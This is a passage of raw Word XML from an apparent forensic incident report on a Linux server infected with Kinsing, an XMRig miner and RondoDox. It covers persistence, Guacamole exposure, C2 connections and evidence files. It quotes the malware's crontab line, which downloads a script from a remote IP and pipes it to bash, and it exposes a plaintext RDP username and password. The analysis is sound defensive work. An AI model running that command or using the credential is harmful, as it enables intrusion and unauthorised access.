      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The most critical persistence mechanism found:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="B22222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Installed: Thu Mar 19 02:19:44 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="B22222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">* * * * * wget -q -O - http://80.64.16.241/mt.sh | bash &gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This runs every minute as root, downloading and executing a shell script from the Kinsing C2 infrastructure. The script is piped directly to bash (fileless), making it invisible to file-based malware scanning. Even if the miner or Kinsing binary is removed, this crontab will re-download and redeploy them within one minute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 — Binary Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Placed in a non-standard /etc/data/ directory. Not a standard Linux path, likely created by the malware.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/data/kinsing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Backup copy. If the primary is removed, Kinsing can restore from backup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/data/kinsing.bak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Miner and backup. Filename mimics the legitimate kernel thread kdevtmpfs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/kdevtmpfsi + /tmp/kdevtmpfsi.bak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 — No ld.so.preload Rootkit Detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The /etc/ld.so.preload file was empty. Kinsing sometimes uses this for library-level rootkits, but it was not deployed in this instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 — No RondoDox Persistence Found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The standard RondoDox persistence paths (/etc/init.d/rondo, /etc/cron.d/rondo, .persisted files) were not present on the server. This suggests the RondoDox binary may have been captured before it successfully established persistence, or it was manually placed by the analysis team rather than deployed by the botnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5 — Attack Surface and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 — Apache Guacamole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell history reveals the server was running Apache HTTP Server with Apache Guacamole (remote desktop gateway). Guacamole installation was performed manually including:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">guacamole-server 1.5.5 compiled from source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat 9.0.89 serving the Guacamole .war</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MariaDB backend with guacamole-auth-jdbc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP proxying to internal hosts (203.0.113.67 visible in history)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Guacamole has known critical RCE vulnerabilities (CVE-2020-9497, CVE-2020-9498, CVE-2023-43826) that are commonly exploited by Kinsing campaigns. The manual compilation from source and the version (1.5.5) suggest it may have been deployed without the latest security patches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 — Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The server had numerous listening ports. Key exposed services visible in process listing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH (sshd) — under active brute-force attack from 8+ global IPs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache2 (HTTP/HTTPS) — hosting agricultureintech.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat (8080) — serving Guacamole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Guacd — Guacamole proxy daemon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MariaDB — database backend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing listener on port 31190</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 — Weak Operational Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell history reveals several operational security issues:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod -R 777 was run on /etc/ssl (all SSL keys world-readable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Plaintext RDP credentials visible in shell history (user OMercer, password gothicy123!)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL private key permissions were subsequently re-restricted to 600</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh agent installed but may not have been configured to detect Kinsing signatures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6 — Network Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 — Active C2 Connections at Time of Capture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">At the moment of forensic extraction, the following malicious connections were active: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Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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Connection Details</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kdevtmpfsi (PID 960488)</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203.0.113.249:35200 -&gt; 185.221.152.130:443 (mining pool, TLS)</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kinsing (PID 48227)</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Listening on 0.0.0.0:31190 (C2 callback port)</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wget (cron-spawned)</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Connecting to 80.64.16.241:80 every 60 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 — Packet Capture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A 10-second packet capture (81,243 bytes) was obtained and saved as brief_capture.pcap. This should be analyzed in Wireshark for additional protocol-level intelligence, particularly the Kinsing C2 protocol and mining pool stratum negotiation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7 — Evidence Inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 — Malware Samples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All malware binaries are stored in malware_samples_INFECTED.zip (password: infected) with .DEFANGED extensions. Contents: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File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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rondo_dump.bin.DEFANGED</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RondoDox botnet binary (123,672 bytes)</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recovered_rondo.bin.DEFANGED</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RondoDox binary (identical copy)</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etc_data_kinsing.bak.DEFANGED</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Kinsing Go binary (5,967,872 bytes)</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tmp_kdevtmpfsi.DEFANGED</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XMRig miner, UPX-packed (2,084,964 bytes)</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tmp_kdevtmpfsi.bak.DEFANGED</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XMRig miner backup (identical)</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tmp_kinsing.bin.DEFANGED</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Empty marker file (0 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 — Forensic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Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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Contents</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evidence/logs/</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ps output, netstat, open files, dmesg, auth logs, syslog, journal, bash history, login history</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evidence/persistence/</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All crontabs, init scripts, systemd units, authorized keys, shell profiles, GRUB config</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evidence/binaries/</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Strings and readelf output for all malware binaries, file metadata, SHA256 hashes</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evidence/network/</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Network connection dumps, C2 connection search, SSH configs, 10-second packet capture</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evidence/memory/</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Running malware proc entries (if available)</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evidence/misc/</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Rootkit indicators, SUID/SGID binaries, package integrity, hidden files, recently modified files</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evidence/scripts/</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Kinsing dropper scripts and shell scripts from temp directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">8 — Kinsing Deep Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 — Go Binary Internals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
